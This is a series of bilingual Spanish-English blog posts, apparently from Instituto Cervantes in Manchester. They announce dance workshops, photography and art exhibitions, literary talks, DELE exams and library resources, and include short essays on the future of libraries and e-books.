¡Qué bien lo pasamos el otro día en nuestra demostración de Flamenco! Este breve taller de carácter gratuito tuvo lugar en el hotel Innside by Meliá de Mánchester.

Nuestra brillante profesora Christine Meadows bailó varias coreografías y después animó a los asistentes a participar. Aprendieron a dar palmadas y a dar sus primeros pasos en flamenco -¡fenomenal el ejemplo de «Alonso/Hamilton» para un movimiento de brazos a velocidad de vértigo!

Próximamente os informaremos de nuevas fechas para demostraciones de tango y salsa. ¡A bailar! 😉

What a great time we had at our Flamenco taster! This workshop took place at Manchester’s Innside hotel. Our brilliant teacher Christine Meadows danced a number of choreographies and afterwards she encouraged the participants to dance a little bit of Flamenco.

They learned hand-clapping and a few steps -hats off to the «Alonso/Hamilton» example so as to move arms at full speed!

¡Ya es verano! Y como no podía ser de otra manera el Instituto Cervantes ya está preparado para ofrecer una buena dosis de ritmo latino. La Salsa es un baile cálido que mezcla influencias africanas y europeas, a través de sonidos y danzas que conforman sus raíces. Normalmente se baila en parejas, pero también de forma individual o como Rueda de Casino. Sin duda, un básico de todos los veranos.

Así que si estás pensando en ir de vacaciones a algún lugar soleado o simplemente quieres sorprender a alguien con nuevos y sensuales movimientos de baile ¡Apúntate a nuestro taller de salsa! Aprende desde los pasos básicos, ritmos, interpretación de la música, hasta la forma de llevar o dejarse llevar. Hay tres niveles y horarios distintos:

–Avanzado: Sábado, 12.00-14.00. Diez sesiones de 2 horas (£141)

Is Summer and Instituto Cervantes is ready to offer a great dosis of Latin Rhythm. Salsa dancing mixes African and European influences through the music and dance fusions that are the roots of Salsa. It is normally a partner dance, although there are recognized solo forms as Rueda de Casino. Definitely, a must all summers.

So, if you are thinking about spending the Holiday in a sunny place or if you just want to impress someone, enroll in our Salsa Workshop! Learn the basic steps, posture, timing and interpretation of music, partner dancing with leading/following freestyle. There are three different levels and times for this workshop series:

El Tango es un baile de origen argentino y uruguayo que se baila en pareja y que se ha extendido hasta ser uno de los bailes más globalizados del mundo. Sensual, apasionado e íntimo, se caracteriza por el abrazo estrecho de la pareja, la caminata tanguera, el corte y la quebrada, y la improvisación. Pero por sobre todo, el tango debe ser bailado con un lenguaje corporal a través del cual se transmiten las emociones a la pareja. Se dice que se baila “escuchando el cuerpo del otro”.

Este verano, el Instituto Cervantes de Mánchester ofrece la oportunidad de aprender este baile tan sensual de la mano del bailarín Chris Shields. Aunque si prefieres bailar sol@, también cabe la posibilidad de aprender otros bailes latinos como la salsa o el flamenco. The Tango is a couple dance originated in Argentina and Uruguay that has become one of the most globalized dance in the world. Sensual, passionate and intimate, it is characterized by the close hug, the «tanguera walk», the cut and the «quebrada», and specially the improvisation. Few dances require such a level of complicity and rapport as the Tango, from there it is said that in order to tango, you need to listen to your partner’s body.

This summer, Instituto Cervantes in Manchester offers the opportunity to learn this hot dancing with the professional dancer Chris Shields. But if you prefer to dance alone, you can also learn dancing other latin dances such as Salsa or Flamenco. Come to Instituto cervantes the 2^nd of July and try a free class of each. Nos complace invitaros a la inauguración de ‘Siente España‘, la muestra fotográfica del reputado fotoperiodista español Marcos Moreno, el próximo 9 de junio, a partir de las 18:30 horas.

La exposición reúne una veintena de imágenes de las fiestas tradicionales más carismáticas de España, llenas de pasión y color.

El propio Marcos Moreno nos visitará en el Instituto Cervantes de Mánchester para contarnos qué hay detrás de esas instantáneas, y compartirá su visión con el público. El evento concluirá con una recepción de vino y aperitivos. La entrada es libre, si bien se recomienda reservar por favor con antelación.

La muestra podrá visitarse hasta el próximo 29 de julio, en horario de lunes a viernes, de 10.30 a 17.30 horas. ¡Os esperamos!

We are so glad to invite you all to the opening of ‘Feel Spain‘, a photographic exhibition by the renowned Spanish photojournalist Marcos Moreno, on 9th June, from 6.30pm on.

It is a collection of twenty images that show the most charismatic and popular traditions in Spain, full of passion and colour.

Marcos Moreno himself will visit us at Manchester’s Instituto Cervantes to tell us what’s behind all those images, and he will share his view with the audience. The evening will finish with a wine and food reception. It is free entry, although it is recommended to book in advance, please.

The exhibition will be open until 29th July, and the opening times are from Monday to Friday, 10.30am to 5.30pm. Join us!

If you are looking to improve your Spanish or just to enjoy while relaxing, have a look to Punto y Coma. An amazing cultural magazine to learn Spanish and more, that is really popular among the library readers.

If you prefer a deeper reading, do not miss ´Dispara, yo ya estoy muerto´. This historic novel written by Julia Navarro that mixes suspense, tragedy and politics has been the most demanding book during May.

Finally, for all cinephiles that love watching great films, La isla mínima is the best option of the moment. The Alberto Rodriguez´s thriller has been one of the top Spanish movies of the last years, thanks to its disconcerting plot and cast.

Parece que el español cada vez tiene más presencia en la tierra de Shakespeare. Durante este mes de mayo, más de 200 candidatos van a intentar conseguir el Diploma de Español como Lengua Extranjera, en 12 centros habilitados por el Instituto Cervantes, entre los que se encuentran algunas de las principales universidades del país.

It seems that the Spanish language is spreading out in Shakespeare´s land. More than 200 candidates are going to take the exam for the Diploma in Spanish DELE in May. It is taking place in 12 different venues, some of the main British universities among them. All of the places will have the special supervision of Instituto Cervantes.

Creative Research Workshop

If you are a member of research community and you want to develop new ways of thinking to create new projects do not miss our next workshop. The 4^th of May, at 6:30 pm Instituto Cervantes in Manchester will hold a really interesting free session to show techniques that will allow science professionals exercise their own intuition and increase the possibilities of provocation so that they can ‘think creatively’.

Spanish experts will use participatory and creative exercises in English in order to work with participants’ own research ideas. Día del Libro – Books´Day

El 23 de abril de 1616 fallecían Shakespeare y Cervantes, una fecha tan simbólica para la literatura universal que fue la escogida para rendir un homenaje mundial al libro y sus autores y promover la lectura. España celebra este día regalando rosas y libros, y el Instituto Cervantes de Manchester se ha sumado a este gesto.

Acércate este sábado y disfruta de todas las actividades organizadas en torno a Cervantes y la literatura hispana completamente gratis: un mercadillo de libros, lectura de poemas, actividades para niños relacionadas con El Quijote y una recepción de vino y snacks. The 23rd of April, 1616 saw the deaths of both Shakespeare and Cervantes. This date was so important for universal literature that was chosen to celebrate World Book Day and to pay homage to the writers and to promote the importance of reading. Spanish people celebrate that day giving away roses and books, and Instituto Cervantes in Manchester has joined this tradition.

The Instituto Cervantes in Manchester is pleased to announce a special day for teachers of Spanish in the Uk & Ireland, to share a wealth of experience and resources.

El Cambio Climático da inicio a este ciclo de eventos la próxima semana, con una magnífica exposición fotográfica cedida por la Alliance Française, cuyo lema es Clima: estado de emergencia y la cual estará presente hasta finales de mes.

Del mismo modo, el 14 de abril El Instituto Cervantes de Mánchester acoge una mesa redonda internacional en la que participan expertos de España, Francia e Italia para tratar de aclarar los aspectos tanto científicos como humanos del este tema tan actual.

On the occasion of Manchester been named European City of Science, the Instituto Cervantes will hold a series of activities to share some of the scientific advances by Spanish researchers in United Kingdom: Spain. Science Is The Key.

The Climate Change will mark the beginning of the events next week with an amazing photograph exhibition ceded by Alliance Française under the theme: Climate, State of Emergency, which will be displayed until the end of the month.

At the same time, on 14 April, The Instituto Cervantes in Manchester will hold an international round table with experts from Spain, France and Italy in order to clarify the different aspects both scientific and human of this current issue.

El frío ya está aquí pero las Navidades pueden ser muy cálidas gracias a las nuevas sesiones de baile que ha lanzado el Instituto Cervantes de Mánchester. El 30 de noviembre, bailaremos sevillanas; y el 5 y 7 de diciembre, bulerías. Además, organizamos un ciclo especial de Tango por Navidad, los días 1, 8 y 15 de diciembre.

Las sevillanas es un baile popular originario de la ciudad española de Sevilla, pero ampliamente conocido en toda Andalucía, así como en el resto de España. Influidas considerablemente por el Flamenco, las sevillanas se bailan en pareja y son muy populares en cada fiesta o feria andaluza.

La bulería, por su parte, es un estilo de flamenco de ritmo acelerado. A medio camino entre la fiesta y la burla, es una danza y género musical muy popular que cuenta con maestros como Camarón de la Isla y Paco de Lucía como máximos exponentes.

Por último, el tango proviene de Argentina y Uruguay, y se caracteriza por la complicidad que requiere su baile en pareja, pues se dice que para bailar tango es preciso escuchar el cuerpo de la pareja.

Cold is here but warm Christmas are possible thanks to the new dance sessions that Manchester’s Instituto Cervantes has organised. Thus, we’ll dance Sevillanas on the 30^th November; and Bulerias on the 5^th and 7^th December. Besides, we have scheduled a special Tango series for Christmas, on 1^st, 8^th and 15^th December.

Sevillanas is a cheerful type of music and dance originate in the Spanish town of Seville, although is commonly known and danced in Andalucia as well as all over Spain. Largely influenced by Flamenco, Sevillanas are danced by couples and they’re particularly popular in every celebration (fiesta o feria) in Andalucia.

Buleria or Bulerias, on the other hand, is a fast rhythm style of Flamenco. Somewhere between fiesta and mockery, it’s a very popular dance and music genre that has maestros such as Camarón de la Isla and Paco de Lucía as prime examples.

Compuesta por lienzos y series gráficas, su obra rezuma color y significado. «El auto exilio se presentó ante mí como una oportunidad de seguir persiguiendo la esperanza de un futuro y sumarme con mi arte a esas voces que dicen: ¡Ya basta!», reflexiona el artista.

We are very pleased to hold the art exhibition by the Mexican artist Raul Loya. Titled ‘Self Exile’, this interesting retrospective is free visiting until next 15th December, Monday to Friday, from 10am to 6pm.

The collection is composed of paintings and some graphic series, and his works are a burst of colour and significance. «Self exile came to me as a chance to keep seeking the hope of a future and join through my art work all those voices that claim: Enough!», reflects the artist.

El martes 13, los escritores Kirmen Uribe y Jesús Carrasco charlarán sobre su pasión, la literatura, a la par que presentarán sus obras traducidas al inglés (Bilbao-New York-Bilbao e Intemperie, respectivamente). El jueves 15, será el turno de la autora catalana Care Santos, que hablará sobre su última novela, Deseo de Chocolate. Ambas citas estarán moderadas por la traductora Mariana Casale O’Ryan.

Instituto Cervantes in Manchester will take part in the 10th edition of Manchester Literature Festival, so next week will be very literary. On Tuesday 13th October, Spanish writers Kirmen Uribe and Jesus Carrasco will discuss about their passion: literature. They will talk about their novels translated into English as well (Bilbao-New York-Bilbao and Out in the Open, respectively). On Thursday 15th October, it will be the Catalan writer Care Santos who will take the word and introduce her latest novel, Desire for Chocolate. Both talks will be chaired by translator Mariana Casale O’Ryan.

The events are free entry but you should book your place through Manchester Literature Festival‘s website.

En un estudio de reciente publicación en YouGov, encontramos el empleo como bibliotecario está entre las profesiones más deseadas en el Reino Unido, aunque no sea uno de los trabajos mejor pagados. Además de ésta, también se incluyen profesiones del mundo literario como el de autor, abogado, periodista, etc, encabezando el ranking de este estudio.

Un 54% de la población les gustarían trabajar en el mundo de las bibliotecas, pese a que la industria editorial está cambiando o evolucionando hacia el entorno digital, con la consecuente disminución del papel impreso. Numerosas bibliotecas en EEUU y España están apostando por esta transformación debido, principalmente, a la falta de presupuesto.

La firma de un acuerdo con Odilo, nueva plataforma española de distribución de ebooks, facilita esta transición. En OdiloPlace, tienda online de Odilo, se pueden adquirir o prestar cerca de 60.000 títulos.

Entre las bibliotecas que utilizan este nuevo sistema de préstamo, se encuentra el Instituto Cervantes que a través de su catálogo en Absys se pueden descargar numerosos ejemplares con sólo ser usuario de la red de bibliotecas. 

According to a research recently published on the website YouGov, we found the librarian that it is one of the most desirable professions, even if it is not one of the better paid.   Como ya anunciamos la semana pasada, sobre de las novedades en la biblioteca electrónica, esta semana os recomendamos que echéis un vistazo a la sección de los libros más prestados durante el mes pues, ya que entre ellos podréis encontrar Todos los cuentos de Gabriel García Márquez, en el que se recopilan todos los cuentos escritos por este autor desde finales de los años 40 hasta mediados de los años 90. Esta recopilación nos ofrece un total de treinta y siete cuentos a través de los cuales podemos disfrutar de este genial autor colombiano.

El mes de octubre ha comenzado con novedades en la Biblioteca electrónica. La colección alcanza ya los 4.000 títulos de libros, audiolibros y vídeos. Además, cuenta con numerosas tipologías de novelas, con material de ELE, con libros de lingüísticas o historia, entre otras temáticas. Todos estos ejemplares están al servicio de nuestros usuarios que cuentan con el carné de la biblioteca.

No obstante, las bibliotecas presenciales de la red cuenta entre sus fondos con audiolibros, DVDs, CDs, novelas, material ELE, libros de historia, etc., de origen Hispanoamericano. Por tanto, el Instituto Cervantes ofrece a sus usuarios una amplia oferta de recursos con ambas bibliotecas.

Como cada año el Instituto Cervantes lleva a cabo el Festival Literario de Mánchester, con el que se pretende hacer llegar diferentes propuestas de la Literatura a nivel mundial.

El próximo 10 de octubre, 18:30 pm., contaremos con la presentación Hablar solos de Andrés Neuman  en la sede, dando comienzo con este encuentro al programa literario y que transcurrirá hasta el 25 de octubre con diferentes actividades culturales.

En la biblioteca contamos con diferentes ejemplares del citado autor en la biblioteca.

Tras las VII Jornadas Didácticas de ELE en el Instituto Cervantes, dónde las diferentes editoriales presentaron sus nuevas ediciones de los manuales de español, la biblioteca cuenta con estos ejemplares para que podáis seguir estudiando español durante estas vacaciones.

Entre estos, las nuevas ediciones mejoradas de SGEL, Nuevo Español en Marcha, que mantiene su enfoque comunicativo controlado, secuencias didácticas cortas que agilizan el aprendizaje, progresión de contenidos ajustada al nivel de los alumnos, contenidos gramaticales, léxicos y funcionales en cuadros para ayuda del estudiante en la realización de actividades, etc.

Lo novedoso de este ejemplar es que contiene un nuevo apartado de «Comunicación y cultura» en todas las unidades para trabajar las destrezas: hablar, escuchar, leer, escribir, incorpora ejercicios prácticos al anexo de «Gramática y vocabulario», tabla de verbos, etc.

After the 6th Teaching Conference of Spanish as a Second Language in Instituto Cervantes, where different publishers presented their new editions of Spanish manuals, the library has these copies so you can continue studying Spanish during this holiday.

Between them, the new enhanced editions SGEL, Nuevo Español en Marcha, which has controlled communicative approach, short teaching sequences that accelerate the learning progression content adjusted to the level of the students, grammatical, lexical and functional contents in order to help the students for doing the exercises, etc.

El pasado 4 de julio, en el Instituto Cervantes se llevaron a cabo las VII Jornadas Didácticas de ELE, en la que pudimos contar con alguna representación significativa del mundo editorial de la enseñanza del Español como Lengua extranjera. Estas editoriales fueron En Clave ELE, Difusión, Edelsa y SGEL. Estuvieron presentando sus diversos materiales y métodos tanto para profesores como para alumnos.

Entre los materiales para los alumnos, podemos destacar las lecturas graduadas, herramienta fundamental para la adquisición de un idioma, ya que podemos adquirir vocabulario y gramática, mientras se puede disfrutar de una buena historia. Para esta ocasión, hemos elegido una lectura de la editorial en Clave ELE, y que, además, podrás descargar en cualquier dispositivo electrónico, tales como móviles, tabletas, etc.

On 4 July, in Instituto Cervantes carried the  6th Teaching Conference of Spanish as a Second Language where we could have some meaningful representation of the publisher in the teaching of Spanish as a Foreign Language. These publishers were en Clave ELE, Difusión, SGEL and Edelsa. They were presenting their various materials and methods as much for teachers and as students.

The materials for the students, we can stand out the graded readers, a fundamental tool for language acquisition, considering that  we acquire vocabulary and grammar, while you can enjoy a good story. Según un artículo publicado en Lectura Lab, el impacto de las bibliotecas sobre la sociedad, a largo plazo, va mucho más allá del aspecto económico, pues se han realizado diversos estudios sobre el impacto que éstas proporcionan. Sin embargo, son unos datos a corto plazo, basados en cifras puramente económicas, mientras que la labor de éstas en otros aspectos, como sociales o culturales, pueden llegar a ser más importantes con el tiempo.

En cuanto al impacto económico, Art Council England sostiene, entre otros aspectos, que las bibliotecas generan en su entorno  un gasto en diferentes sectores como por ejemplo en contratar más personal o en los pedidos a las editoriales. Todo esto por debido al incremento de usuarios, con necesidades específicas, pero además, también estos cuando van a la biblioteca pueden llegar a hacer uso de cafeterías, taxis, tiendas, lo que sería también un valor añadido para estos sectores.

Por otro lado, está el impacto social, The bookseller y Art Council England recogen la contribución de éstas en las diferentes comunidades  ya que juegan un papel importante en la formación, educación, mantenimiento físico y mental de los usuarios, pues la socialización es importante en ciudades dónde existe la multiculturalidad.

All this due to the increase of users with specific needs, but the can also spend money when they go to the library in bars, taxis, shops, which would also be a plus for these sectors.

On the other hand, the social impact exists as well, The bookseller and Art Council England collect the contribution of the libraries in the various communities as they play an important role in training, education, physical and mental maintenance because the socialization is very important in cities where multiculturalism exists.

Objetivo: que los participantes, además de asistir con provecho a los cursos formativos de carácter cultural, puedan vivir un intenso periodo de inmersión lingüística y conocer de cerca muchos aspectos del día a día de la sociedad española. Con este fin, el programa académico se complementa por las tardes con talleres, visitas turísticas y asistencia a espectáculos.

La oferta académica y cultural, bajo la dirección del Instituto Cervantes, contemplará la impartición de los Cursos de cultura española I (28 de julio -3 de agosto), II (4-10 de agosto) y III (11-17 de agosto) en horario de mañana.

La oferta de turismo y ocio, a cargo de la Fundación Colegios Mayores, incluirá la celebración de actividades extracurriculares por la tarde: talleres, excursiones, visitas guiadas y asistencia a espectáculos.

The Instituto Cervantes and the Fundación Colegios Mayores MAEC-AECID held in summer 2014 specialized courses culture, tourism and leisure in Madrid.

Objective: the participants, and assist with the training courses benefit cultural, can live an intense period of immersion and learn about many aspects of everyday life of Spanish society. To this end, the academic program is complemented by afternoon workshops, sightseeing and attending shows.

The academic and cultural, under the direction of the Instituto Cervantes, contemplate the teaching of Spanish culture courses I (28 july – 3 agost), II (4 – 10 agost) and III (11 – 17 agost) in the morning.

The supply of tourism and leisure, by the Higher Colleges Foundation, will include the celebration of extracurricular activities in the afternoon workshops, tours, excursions and attending shows.

La Universidad Complutense de Madrid inició en 1988 un proyecto nuevo para tender puentes entre la ciencia, la cultura, la política y la sociedad española. In 1988 the Complutense University decided to embark on a new endeavour to become a meeting point for Science, Culture, Politics and Spanish society. Hence, the beginning of the Summer Courses, an annual showcase of new knowledge and its protagonists, an intellectual exchange with a focus on plurality and the dissemination of the most recent advances in all areas of the sciences, humanities and the arts.

The University can thus satisfy people’s curiosity and delve into areas of interest that cannot always be addressed during the regular school year. The Summer Courses are held at a historic site of great beauty and the lecturers, all specialists in their field, are more accessible.      La editorial Difusión ha publicado la nueva edición de Aula Internacional 3, en la que se ha renovado su lenguaje gráfico, recoge las sugerencias de los usuarios y además, incorpora las nuevas tecnologías de la información. Este manual quiere llevar al aula de español los enfoques comunicativos más avanzados.

    Este nuevo ejemplar, al igual que Aula Internacional 1 y Aula Internacional 2, ha sido mejorada en cuanto a contenido, es decir, ahora el libro  diversas partes como el libro del alumno, el cuaderno de ejercicio (más ejercicios), un CD con las audiciones, un extenso resumen gramatical (más gramática) y una completa tabla de verbos regulares e irregulares.

 The Publisher Difusión has published the new edition of Aula International 3, in which it has renewed its graphic language, it compiles the suggestions of the users,and, moreover, it adds the new technology of the information. This book provides the communicational approach more advanced for the spanish classes.

This new copy, the same than Aula Internacional 1 and Aula Internacional 2, has been improved along with its contents,  the book has several parts such as student´s section, the exercise section (more exercises), also a CD with listenings, and a wide grammatical summary (more grammar) in addition to a completed table with regular and irregular verbs.

In a short time, we will be able to have this renewed book in our library in order to our users can use it and they can carry on with their Spanish studies.

Las bibliotecas han sido una realidad consolidada a lo largo de los siglos, que surgieron para garantizar el acceso a la información, cuyo propósito ha sido y es ayudar a sus usuarios en el proceso de transformar la información en conocimiento. Por tanto, la biblioteca pasa como espacio físico dónde conservar documentos a suministradora de información.

Según Peter Johan Lor, Secretario General IFLA (International Federation of Library Associations and Institutions),» las bibliotecas ocupan un papel central en la Sociedad de la Información porque son el nexo entre infraestructuras en tecnología y comunicación, contenidos y mediadores». Ahora bien, la sociedad está en continúo cambio, junto con sus necesidades, en el que se está originando nuevas formas de búsquedas de conocimiento que con el uso de Internet se pueden obtener de manera rápida gracias al uso de World Wide Web.

Ante el creciente uso de Internet y la creciente venta de libros electrónicos o tablets, cabría preguntarse acerca del futuro de las bibliotecas ¿desaparecerán? Según, un estudio realizado por la comunidad de bibliotecarios, LibraryScience.com, las bibliotecas tendrán que evolucionar para satisfacer las nuevas necesidades de los usuarios, así como el bibliotecario tendrá que reconvertirse en «centinela, evaluador, filtro, garantizador, sintetizador, conector y facilitador» de la información obtenida de Internet y que tiene que proporcionar a estos. También en este estudio se puede comprobar que el porcentaje del uso de libros electrónicos va en aumento, lo que sería un inconveniente para las bibliotecas ya que con el tiempo el libro en formato papel, desaparecerá y dejará paso a los nuevos formatos digitales, mucho más ligero y fácil de transportar, quedando atrás el pesado «mamotreto» en papel.

Prueba de ello, sin ir más lejos es el Multiebook. La editorial Bruno, junto con la empresa Giux lo presentaron en 2011, en el Salón Internacional del libro de Turín, este prototipo es un dispositivo que permite descargar ebooks en teléfonos móviles, discos duros o dispositivos USB  con sólo insertar una moneda/billete. Además otro uso de éste sería la posibilidad de descargar textos de interés para los asistentes a ferias o congresos, además e la posibilidad de obtener libros en estaciones, aeropuertos o bibliotecas.

Según su creador, Alessandro Ercolnai, es un modo de conseguir la democratización del libro digital, ya que estarán disponibles en cualquier entorno para el libre acceso de todo el mundo. Bruno Editore posee el 80% de cuota de mercado del libro digital en Italia y sus ventas van en un rápido aumento, con una  provisión de ventas de más de 100.000 ebooks para los años suscesivos.

Por consiguiente, si este nuevo» invento» surte los efectos oportunos que se esperan, ¿qué pasaría con las bibliotecas? Esta incógnita quedaría despejada en unos años cuando se vean los resultados y las estadísticas del uso de dispositivos digitales.

Libraries have been considered over the centuries as a most reliable way to access to information, the purpose of library is to help its user to transfer information into knowledge. Therefore, the library passes conserve physical space where supplying of information documents.

Nowadays, everything are in a continuous change, the change is based on need. Companies and organization are creating new forms of knowledge and webs for searching and looking for info such as interne and it can be obtained quickly by using World Wide Web.

With the growing use of the Internet and the increasing sales of electronic books or tablets, we might wonder about the future of libraries, will they disappear? According to a study by the library community, LibraryScience.com, libraries have to evolve to meet the changing needs of users and the librarian will have to be reconverted to “sentinel evaluator filter, guarantor, synthesizer, connector and facilitator » of the information obtained from the Internet and you have to provide same services. Also in this study it can be seen that the percentage use of e-books is growing, which would impact on libraries and that eventually the book in paper form, the new digital formats are much more light and easy to carry, leaving behind heavy » tome » on paper. Proof of this, without going any further is the Multiebook. The publisher Bruno, along with the company Giux presented it in 2011 at the International Book Fair of Turin, this prototype is a device that let you download ebooks on mobile phones, hard disks or USB devices by simply inserting a coin / bill. In addiction some use to download texts of interest to those attending fairs or congresses, and the possibility of obtaining books in stations, airports or libraries.

El Instituto Cervantes de Manchester acoge desde el 20 de marzo al 8 de mayo una exposición única. Descubriendo la Invisibilidad se compone de 22 fotografías que muestran las vidas y experiencias de diversos miembros de la comunidad latinoamericana en el Reino Unido. La exposición está teniendo una gran acogida por parte del público, quienes se acercan a descubrir las historias que esconde cada fotografía.

El acto de inauguración se celebró el pasado 20 de marzo, donde asistieron a la presentación los mismos fotógrafos, Roxana y Pablo Allison, así como la doctora Cathy Mcilwaine de la Queen Mary University of London, cuyo informe No Longer Invisible ha servido como inspiración para este proyecto, la doctora Catherine Davies de la University of Nottingham y asimismo participaron en el coloquio la doctora Parvathi Kumaraswami de la Universidad de Manchester y Laura Carletti, quien acudió para presentar la innovadora tecnología NFC, gracias a la cual se pueden escuchar los testimonios de los fotografiados mediante nuestros propios smartphones.

Este próximo jueves 10 de abril a las 18:30h continuamos con otra conferencia en torno a la exposición. En esta ocasión, Claudio Chipana, miembro de LARC (Latin American Recognition Campaign) y Maria Canizales Jerez, de Latin Support Group parte de Migrants Supporting Migrants,  compartirán con nosotros su punto de vista y conocimientos sobre la materia. La entrada es libre, por lo que estáis todo el que se quiera acercar esta invitado.

The Instituto Cervantes has become home to a unique exhibition, Uncovering the Invisible, a series of 22 photographs documenting the lives and experiences of members of the Latin American community living here in the UK. Every day visitors come to see the exhibition, and discover the stories behind each photograph.

We celebrated the opening of the exhibition on the 20th of March, where we were joined by the photographers, Roxana and Pablo Allison themselves, as well as Professor Cathy Mcilwaine from Queen Mary University of London, on whose academic research, No Longer Invisible, the series is based. Professor Catherine Davies from the University of Nottingham was also here to discuss about the subject of the identity and recognition of Latin America communities throughout the UK. Professor Parvathi Kumaraswami from the University of Manchester and Laura Carletti, from the University of Nottingham, also participated in the talk. Laura Carletti also introduced the audience to NFC technology, through which everyone with a smartphone is able to listen to the testimonies of the subjects from the pictures.

On this Thursday 10th of April at 18:30, Claudio Chipana, a member of LARC (Latin American Recognition Campaign) and Maria Canizales Jerez, from the Latin Support Group (part of Migrants Supporting Migrants), will share their point of view and expertise on the subject. Nuestros amigos de la Universidad de Leeds han invitado a la escritora, cineasta y guionista Ángeles González-Sinde, que presentará su último libro El buen hijo (2013) finalista del premio Planeta. La ex ministra de Cultura y ex presidenta de la Academia de las Artes y Ciencias Cinematográficas de España ofrecerá una conferencia acerca de su polifacética carrera y su trabajo como escritora. Después leerá varios extractos de El buen hijo.

El acto se celebrará el martes,18 de marzo a las 5.30pm en la Biblioteca Central de Leeds, en el salón de actos de la 3ª planta. La entrada es libre.

Our friends at the University of Leeds have invited the writer, filmmaker and scripwriter Ángeles González-Sinde who will talk about her book El buen hijo / The good son (2013), which was the runner-up for the prestigious Planeta book prize. The Spain’s former Minister of Culture and President of the National Film Academy will talk about her multifaceted career and literary craft, and she will read some choice passages from El buen hijo.

 The will take place on Tuesday, 20th of March, at Leeds Central Library, 3rd floor meeting room. Admission is free.

    La Wellcome Collection ha colgado un banco de imágenes variadas y singulares del mundo, las Wellcome Images, para disfrute del público en general. Mediante licencia de Creative Commons, es decir, para uso personal y no comercial, se pueden descargar más de 100.000 ilustraciones en alta resolución.

    Este museo londinense, autodefinido como “el libre destino de los incurablemente curiosos”, cuenta entre sus fondos con obras de arte, fotos de época, ilustraciones religiosas, láminas botánicas, médicas,…, además, se pueden consultar centenares de manuscritos de textos tibetanos. Pero lo que hace realmente interesante a este conjunto pictórico, es su colección de 40 grabados de Goya y la temática española que se puede consultar/ descargar a través de su motor de búsqueda.

    Para realizar estas búsquedas, descargarse o imprimir estas imágenes no es necesario darse de alta en la página web pero si nos interesa alguna o algunas en particular, pueden ser guardadas en una carpeta llamada My Lightboxes, con el fin de hacer una selección de las mismas.

    Por lo tanto, en Wellcome Images podremos encontar una colección bastante interesante con diferente temática, que va desde la medicina hasta lo mágico, pasando por lo profano o la bioquímica. Un museo virtual que quiere satisfacer la creciente demanda en estos campos, que persiguen la búsqueda del conocimiento a través de Internet y  de las webs 2.0, sin necesidad de visitar in situ los museos, siendo cada vez más, los museos que digitalizan sus fondos para que los usuarios tengan fácil acceso a ellos. Como es el caso también de la Biblioteca Nacional de España, que ha digitalizado parte de estos y que pueden ser consultados a través de su portal web Biblioteca Digital Hispánica.

    The Wellcome Collection opened a bank of a varied and unique images of the world, Wellcome Images for the enjoyment of the general public. Using the Creative Common license i.e. for personal and non-commercial use, you can download more than 100,000 high resolution pictures.

    This London museum defines itself as “free destiny for the incurably curious,» and counts amongst its collection works of art, vintage photos, religious artwork, botanical & medical prints… hundreds of manuscripts of Tibetan texts also can be found. But what makes this really pictographic set interesting is its Spanish themed collection, including 40 prints by Goya which can be viewed / downloaded via their search engine.

   To search, download or print these images, you don’t need to register on the website but if you are interested in one or two in particular, they can be saved in a folder called My Lightboxes , in order to create a selection.

    Therefore, in Wellcome Images you can find an interesting collection with different themes, ranging from medicine to magic, from the profane to biochemistry. A virtual museum that aims to satisfy the growing demand in this area; the pursuit of knowledge through the Internet and web 2.0 without visiting museums in situ means that increasingly museums digitize some of their resources so users can access them easily. As is also the case at the National Library of Spain, which has digitalized parts of their collection that be seen on their website Digital Library Hispanic.
